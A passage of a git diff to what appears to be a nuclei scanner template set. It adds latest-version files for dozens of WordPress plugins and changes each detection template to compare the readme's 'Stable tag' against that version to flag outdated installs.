9e3177b6d0..68dd789380 100644 --- a/technologies/wordpress/wordpress-redux-framework.yaml +++ b/technologies/wordpress/wordpress-redux-framework.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-redux-framework.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.txt b/technologies/wordpress/wordpress-regenerate-thumbnails.txt new file mode 100644 index 0000000000..97ceee1b9f --- /dev/null +++ b/technologies/wordpress/wordpress-regenerate-thumbnails.txt @@ -0,0 +1 @@ +3.1.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml index 78556bd312..4eacb70003 100644 --- a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-regenerate-thumbnails.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-safe-svg.txt b/technologies/wordpress/wordpress-safe-svg.txt new file mode 100644 index 0000000000..6acdb44289 --- /dev/null +++ b/technologies/wordpress/wordpress-safe-svg.txt @@ -0,0 +1 @@ +2.0.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-safe-svg.yaml b/technologies/wordpress/wordpress-safe-svg.yaml index 4f3a1f9317..5793e4747d 100644 --- a/technologies/wordpress/wordpress-safe-svg.yaml +++ b/technologies/wordpress/wordpress-safe-svg.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-safe-svg.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.txt b/technologies/wordpress/wordpress-seo-by-rank-math.txt new file mode 100644 index 0000000000..e148b09508 --- /dev/null +++ b/technologies/wordpress/wordpress-seo-by-rank-math.txt @@ -0,0 +1 @@ +1.0.103.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.yaml b/technologies/wordpress/wordpress-seo-by-rank-math.yaml index 193bfd32e1..a3caf4b51c 100644 --- a/technologies/wordpress/wordpress-seo-by-rank-math.yaml +++ b/technologies/wordpress/wordpress-seo-by-rank-math.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-seo-by-rank-math.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sg-cachepress.txt b/technologies/wordpress/wordpress-sg-cachepress.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-sg-cachepress.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-sg-cachepress.yaml b/technologies/wordpress/wordpress-sg-cachepress.yaml index 268111b662..b657e7b26d 100644 --- a/technologies/wordpress/wordpress-sg-cachepress.yaml +++ b/technologies/wordpress/wordpress-sg-cachepress.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-sg-cachepress.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sg-security.txt b/technologies/wordpress/wordpress-sg-security.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-sg-security.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-sg-security.yaml b/technologies/wordpress/wordpress-sg-security.yaml index b5a8d979ca..4ae436ca78 100644 --- a/technologies/wordpress/wordpress-sg-security.yaml +++ b/technologies/wordpress/wordpress-sg-security.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-sg-security.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.txt b/technologies/wordpress/wordpress-shortcodes-ultimate.txt new file mode 100644 index 0000000000..4e19b2f721 --- /dev/null +++ b/technologies/wordpress/wordpress-shortcodes-ultimate.txt @@ -0,0 +1 @@ +5.12.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml index 8aaf7f03b6..1030f3cf12 100644 --- a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml +++ b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-shortcodes-ultimate.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.txt b/technologies/wordpress/wordpress-shortpixel-image-optimiser.txt new file mode 100644 index 0000000000..ed95ef7767 --- /dev/null +++ b/technologies/wordpress/wordpress-shortpixel-image-optimiser.txt @@ -0,0 +1 @@ +5.1.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml index 7b846f66ae..abfbf0156e 100644 --- a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-shortpixel-image-optimiser.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.txt b/technologies/wordpress/wordpress-simple-custom-post-order.txt new file mode 100644 index 0000000000..1b03fe63dd --- /dev/null +++ b/technologies/wordpress/wordpress-simple-custom-post-order.txt @@ -0,0 +1 @@ +2.5.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.yaml b/technologies/wordpress/wordpress-simple-custom-post-order.yaml index 64cdb3db3e..f454707b14 100644 --- a/technologies/wordpress/wordpress-simple-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-simple-custom-post-order.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-simple-custom-post-order.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-simple-page-ordering.txt b/technologies/wordpress/wordpress-simple-page-ordering.txt new file mode 100644 index 0000000000..6550da6970 --- /dev/null +++ b/technologies/wordpress/wordpress-simple-page-ordering.txt @@ -0,0 +1 @@ +2.4.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-simple-page-ordering.yaml b/technologies/wordpress/wordpress-simple-page-ordering.yaml index 5b8e259b8c..6c518e9349 100644 --- a/technologies/wordpress/wordpress-simple-page-ordering.yaml +++ b/technologies/wordpress/wordpress-simple-page-ordering.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-simple-page-ordering.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-siteguard.txt b/technologies/wordpress/wordpress-siteguard.txt new file mode 100644 index 0000000000..bbf649f614 --- /dev/null +++ b/technologies/wordpress/wordpress-siteguard.txt @@ -0,0 +1 @@ +1.7.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-siteguard.yaml b/technologies/wordpress/wordpress-siteguard.yaml index ba11a93c05..95e27e9467 100644 --- a/technologies/wordpress/wordpress-siteguard.yaml +++ b/technologies/wordpress/wordpress-siteguard.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-siteguard.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-siteorigin-panels.txt b/technologies/wordpress/wordpress-siteorigin-panels.txt new file mode 100644 index 0000000000..a4cc673ab3 --- /dev/null +++ b/technologies/wordpress/wordpress-siteorigin-panels.txt @@ -0,0 +1 @@ +2.20.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-siteorigin-panels.yaml b/technologies/wordpress/wordpress-siteorigin-panels.yaml index 9ea487dc9f..261de94078 100644 --- a/technologies/wordpress/wordpress-siteorigin-panels.yaml +++ b/technologies/wordpress/wordpress-siteorigin-panels.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-siteorigin-panels.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-smart-slider-3.txt b/technologies/wordpress/wordpress-smart-slider-3.txt new file mode 100644 index 0000000000..17d4961af1 --- /dev/null +++ b/technologies/wordpress/wordpress-smart-slider-3.txt @@ -0,0 +1 @@ +3.5.1.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-smart-slider-3.yaml b/technologies/wordpress/wordpress-smart-slider-3.yaml index a657368f41..1f0788d50d 100644 --- a/technologies/wordpress/wordpress-smart-slider-3.yaml +++ b/technologies/wordpress/wordpress-smart-slider-3.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-smart-slider-3.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.txt b/technologies/wordpress/wordpress-so-widgets-bundle.txt new file mode 100644 index 0000000000..3b76afcacc --- /dev/null +++ b/technologies/wordpress/wordpress-so-widgets-bundle.txt @@ -0,0 +1 @@ +1.44.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.yaml b/technologies/wordpress/wordpress-so-widgets-bundle.yaml index 54db8a0414..75159dfbb2 100644 --- a/technologies/wordpress/wordpress-so-widgets-bundle.yaml +++ b/technologies/wordpress/wordpress-so-widgets-bundle.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-so-widgets-bundle.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt new file mode 100644 index 0000000000..fbafd6b600 --- /dev/null +++ b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.txt @@ -0,0 +1 @@ +2.7.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml index 33942e48ca..0cf3c465e5 100644 --- a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml +++ b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ssl-insecure-content-fixer.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt new file mode 100644 index 0000000000..5623d118b3 --- /dev/null +++ b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.txt @@ -0,0 +1 @@ +9.0.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml index 00d8795fca..60d88eded6 100644 --- a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml +++ b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-stops-core-theme-and-plugin-updates.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sucuri-scanner.txt b/technologies/wordpress/wordpress-sucuri-scanner.txt new file mode 100644 index 0000000000..ab63198823 --- /dev/null +++ b/technologies/wordpress/wordpress-sucuri-scanner.txt @@ -0,0 +1 @@ +1.8.35 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-sucuri-scanner.yaml b/technologies/wordpress/wordpress-sucuri-scanner.yaml index c49f159ec1..174f8c171e 100644 --- a/technologies/wordpress/wordpress-sucuri-scanner.yaml +++ b/technologies/wordpress/wordpress-sucuri-scanner.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-sucuri-scanner.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-svg-support.txt b/technologies/wordpress/wordpress-svg-support.txt new file mode 100644 index 0000000000..d21aa93ccd --- /dev/null +++ b/technologies/wordpress/wordpress-svg-support.txt @@ -0,0 +1 @@ +2.5.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-svg-support.yaml b/technologies/wordpress/wordpress-svg-support.yaml index e53f13fa3c..a3cb418440 100644 --- a/technologies/wordpress/wordpress-svg-support.yaml +++ b/technologies/wordpress/wordpress-svg-support.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-svg-support.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.txt b/technologies/wordpress/wordpress-table-of-contents-plus.txt new file mode 100644 index 0000000000..de4f119c79 --- /dev/null +++ b/technologies/wordpress/wordpress-table-of-contents-plus.txt @@ -0,0 +1 @@ +2106 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.yaml b/technologies/wordpress/wordpress-table-of-contents-plus.yaml index 5cfe5969bc..131949d219 100644 --- a/technologies/wordpress/wordpress-table-of-contents-plus.yaml +++ b/technologies/wordpress/wordpress-table-of-contents-plus.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-table-of-contents-plus.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-tablepress.txt b/technologies/wordpress/wordpress-tablepress.txt new file mode 100644 index 0000000000..ba885f1bb4 --- /dev/null +++ b/technologies/wordpress/wordpress-tablepress.txt @@ -0,0 +1 @@ +1.14 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-tablepress.yaml b/technologies/wordpress/wordpress-tablepress.yaml index 26bbee5e02..931b9961f9 100644 --- a/technologies/wordpress/wordpress-tablepress.yaml +++ b/technologies/wordpress/wordpress-tablepress.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-tablepress.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.txt b/technologies/wordpress/wordpress-taxonomy-terms-order.txt new file mode 100644 index 0000000000..3511591dec --- /dev/null +++ b/technologies/wordpress/wordpress-taxonomy-terms-order.txt @@ -0,0 +1 @@ +1.7.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml index ca90714e65..602aa899ad 100644 --- a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml +++ b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-taxonomy-terms-order.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-the-events-calendar.txt b/technologies/wordpress/wordpress-the-events-calendar.txt new file mode 100644 index 0000000000..81f0c273ca --- /dev/null +++ b/technologies/wordpress/wordpress-the-events-calendar.txt @@ -0,0 +1 @@ +6.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-the-events-calendar.yaml b/technologies/wordpress/wordpress-the-events-calendar.yaml index 24a333b33a..69c95304f7 100644 --- a/technologies/wordpress/wordpress-the-events-calendar.yaml +++ b/technologies/wordpress/wordpress-the-events-calendar.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-the-events-calendar.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-themeisle-companion.txt b/technologies/wordpress/wordpress-themeisle-companion.txt new file mode 100644 index 0000000000..f577dfda01 --- /dev/null +++ b/technologies/wordpress/wordpress-themeisle-companion.txt @@ -0,0 +1 @@ +trunk \ No newline at end of file diff --git a/technologies/wordpress/wordpress-themeisle-companion.yaml b/technologies/wordpress/wordpress-themeisle-companion.yaml index 53c940db3d..a490dcc7c1 100644 --- a/technologies/wordpress/wordpress-themeisle-companion.yaml +++ b/technologies/wordpress/wordpress-themeisle-companion.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-themeisle-companion.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-tinymce-advanced.txt b/technologies/wordpress/wordpress-tinymce-advanced.txt new file mode 100644 index 0000000000..4cc0e35cb3 --- /dev/null +++ b/technologies/wordpress/wordpress-tinymce-advanced.txt @@ -0,0 +1 @@ +5.6.0 \ No newline at end of file 